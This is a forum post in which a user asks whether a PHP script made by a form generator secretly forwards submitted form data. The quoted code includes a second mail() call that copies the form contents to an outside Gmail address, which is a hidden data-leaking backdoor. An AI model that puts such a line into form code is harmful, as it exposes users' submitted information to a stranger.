is my secure form information being sent to someone else?
After it was completed I went in and looked at the php file that was created and here is what part of the code contained.
*I modified the email and domain names
$headers = "MIME-Version: 1.0" . "\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1" . "\r\n";
$headers .= "From: info@mysite.net <info@mysite.net>" . "\r\n";
mail($to1,$subject1,$mailcontent1,$headers);
mail("emailnotmine@gmail.com",$subject1,$mailcontent1,$headers);
Does the last line of code mean the information is being sent to the email address emailnotmine@gmail.com?
Ron
:)
The 2nd Amendment, 1789 - The Original Homeland Security.
Gun control means never having to say, "I missed you."